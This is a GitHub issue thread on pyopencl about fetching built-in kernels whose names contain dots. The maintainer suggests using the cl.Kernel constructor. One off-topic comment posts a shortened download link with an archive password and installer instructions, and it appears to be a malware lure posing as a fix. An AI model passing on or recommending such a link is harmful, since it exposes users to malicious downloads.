### ISSUE TITLE
More ergonomic way to access builtin kernels with weird names.

### ISSUE THREAD

**Issue by jansol** [inducer/pyopencl#782]
Sorry for the double post, figured this deserves its own tracking issue. Continuing from #777:

```python
bik_prg = cl.create_program_with_built_in_kernels(ctx, [devices[0]], ["pocl.add.i8"])
bik_prg.build()
for k in bik_prg.all_kernels():
    name = k.get_info(cl.kernel_info.FUNCTION_NAME)
    if name == "pocl.add.i8":
        bik_knl = k
bik_knl(queue, a_np.shape, None, a_g, b_g, bikres_g)
```

Fetching the kernel via the `kernel_name` attribute is not possible since the builtin kernel name gets mangled by pyopencl to `"pocladdi8"` but it seems `kernel_name` gets passed as is to clCreateKernel which of course fails in this case since it expects `"pocl.add.i8"`. Something like an `__getitem__(self, kernel_name)` or a helper function to fetch kernels by (string) name would be nice.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by inducer** [comment]
`cl.Kernel(bik_prg, "pocl.add.i8")` should work. Does that do the trick for you?

It's documented [here](https://documen.tician.de/pyopencl/runtime_program.html#pyopencl.Kernel), but that's arguably not very discoverable. I'll add a note to the docs.

**Comment by inducer** [comment]
BTW: `k.get_info(cl.kernel_info.FUNCTION_NAME)` could be `k.function_name` I think.

**Comment by jansol** [comment]
> BTW: `k.get_info(cl.kernel_info.FUNCTION_NAME)` could be `k.function_name` I think.

Ohh, I see, I've mis-parsed the `info` section then. That does indeed make more sense. I'll give the constructor a try tomorrow, that should indeed do it.

**Comment by jansol** [comment]
Yep, the constructor is as good as it gets. Thanks for the docs clarification!
